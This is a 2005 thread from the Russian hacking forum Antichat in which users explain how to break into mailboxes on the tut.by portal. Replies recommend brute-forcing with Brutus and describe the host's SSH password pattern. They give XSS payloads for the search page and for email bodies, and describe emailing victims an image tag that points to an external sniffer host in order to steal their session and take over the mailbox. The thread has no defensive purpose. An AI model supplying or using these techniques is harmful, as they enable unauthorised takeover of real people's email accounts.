Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
12.10.2005, 20:15
|
|
Новичок
Регистрация: 10.10.2005
Сообщений: 2
Провел на форуме:
4067
Репутация:
0
|
|
tut.by
Народ кто-нибудь знает как ломать ящики на tut.by?
|
|
|
12.10.2005, 21:21
|
|
Участник форума
Регистрация: 02.08.2005
Сообщений: 172
Провел на форуме:
2049838
Репутация:
100
|
|
Brutus в руки и погнал......
|
|
|
|
12.10.2005, 22:11
|
|
Новичок
Регистрация: 10.10.2005
Сообщений: 2
Провел на форуме:
4067
Репутация:
0
|
|
Брутус - это и ёжику понятно. А как-нить поумнее можно?  |
|
|
|
13.10.2005, 22:04
|
|
Новичок
Регистрация: 17.08.2005
Сообщений: 16
Провел на форуме:
82828
Репутация:
0
|
|
Все сайты, которые они хостят, лежат вмесе с их мыльницей на одном серве.
ЗЫ для каждого хостящегося есть ssh. Пассы на ssh обычно:
логин - низвание сайта без домена, а пароль комбинация 9 чисел и букв.
Там дохрена сайтов с ipb и phpbb помойму до сих пор валяется.
|
|
|
|
16.10.2005, 09:15
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
Хм..
Умнее... Ищи xss. Есть пасивная в поле поискового запроса, прямо на главной, там в теге title ничего не фильтруется. xss выглядит так:
Код:
</title><script>alert('Antichat (c)!')</script>
Может пригодиться..
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 16.10.2005 в 09:19..
|
|
|
|
16.10.2005, 10:03
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
Взлом tut.by
Ну чтож.. На редкость дырявый портал. За 20 минут было обнаружено несколько активных xss в теле письма. Вот пример:
Код:
<style type="text/css">@import url(javascript:alert('Antichat have it!'));</style>
Работает в IE. Поскольку для аутентификации куки не используются, то взлом упрощается до нельзя. Всего навсего требуется сессия. Отправляешь жертве такую тему:
Код:
Привет, как дела?
<img src="http://antichat.ru/cgi-bin/s.jpg">
и подписываешься на снифер. ВСЁ! Ящик твой.
Палева - 0, эффективность - 100%, жаль пароля не будет) Очень рекомендую использовать при этом программу XSS Tester от LittleLamer. Можно скачать с этой странички.
Если прибавишь мне репутацию, то я не обижусь.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 16.10.2005 в 13:45..
|
|
|
|
17.10.2005, 02:01
|
|
Познающий
Регистрация: 05.12.2003
Сообщений: 54
Провел на форуме:
173295
Репутация:
0
|
|
Мда ....осталось только чтобы жертва почту првоеряла через инет =))
|
|
|
|
18.10.2005, 13:43
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
Только осталось... Так говоришь, как будто это делают единицы) По мне так, пускай лучше меня взламает неизвестный мне тип, чем сосед по локалке, который отснифал пасс по POP3... Портал вообще безбашенный в плане безопасности.. Куда смотрят...
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 18.10.2005 в 13:46..
|
|
|
|
18.10.2005, 15:09
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862
Репутация:
54
|
|
А если отснифовать куки с почтовика-то нельзя будет полностью забрать этот ящик себе? Т.е. сменить пароль?
|
|
|
|
18.10.2005, 17:09
|
|
Участник форума
Регистрация: 13.10.2005
Сообщений: 210
Провел на форуме:
371736
Репутация:
14
|
|
А я присылаю себе картинку от снифера, но не вижу себя в логах. Уже на нескольких почтах делал. Что-то изменили?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
